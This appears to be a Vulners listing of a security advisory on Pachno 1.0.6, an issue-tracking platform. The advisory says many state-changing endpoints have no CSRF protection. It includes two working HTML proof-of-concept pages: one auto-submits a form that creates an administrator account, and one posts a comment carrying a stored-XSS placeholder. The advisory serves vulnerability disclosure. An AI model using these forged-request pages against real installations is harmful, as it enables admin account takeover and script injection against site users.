Vulners
Lucene search
📄 Pachno 1.0.6 Cross Site Request Forgery
Pachno 1.0.6 Cross-Site Request Forgery
Vendor: Daniel André Eikeland
Product web page: https://github.com/pachno/pachno
Affected version: 1.0.6
Summary: Pachno is an open-source collaboration platform (formerly known as The Bug Genie)
designed for team project management, issue tracking, and documentation. It offers a module-based,
customizable environment for software development and team workflows, distributed under the
Mozilla Public License.
Desc: CSRF protection in the application is opt-in via the @CsrfProtected annotation and the
csrf_enabled route flag, both of which are absent from a large set of state-changing endpoints
including login, registration, logout, file upload, milestone editing, group/role/team/client/user
administration, and Livelink commit posting. No same-origin enforcement, anti-CSRF token, or
SameSite=Strict cookie attribute is in place to compensate. This can be exploited to perform
arbitrary actions in context of an authenticated user, including forced logout, account creation
by an admin, role modification, comment injection, and file upload. This can be exploited to
perform certain actions with administrative privileges if a logged-in user visits a malicious
web site.
Tested on: GNU/Linux
Apache2
PHP/7.4
MySQL/5.7 (MariaDB)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2026-5983
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5983
06.04.2026
--
CSRF Add Admin:
---------------
<html>
<body onload="document.forms[0].submit();">
<form method="POST" action="http://127.0.0.1/configure/users">
<input type="hidden" name="username" value="testingus" />
<input type="hidden" name="password" value="pwd123" />
<input type="hidden" name="password_repeat" value="pwd123" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="realname" value="ZSL" />
<input type="hidden" name="group_id" value="1" />
</form>
</body>
</html>
CSRF Script Injection (Stored XSS):
-----------------------------------
<html>
<body>
<form id="csrf" method="POST" action="http://127.0.0.1/project/issues/17/comment">
<input name="comment_body" value="IMPORTANTE: XSS Payload Here!" />
<input name="comment_applies_type" value="1" />
<input name="comment_applies_id" value="17" />
<input name="comment_module" value="core" />
<input name="comment_visibility" value="1" />
<input name="comment_body_syntax" value="0" />
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Apr 2026 00:00Current
5.2Medium risk
Vulners AI Score5.2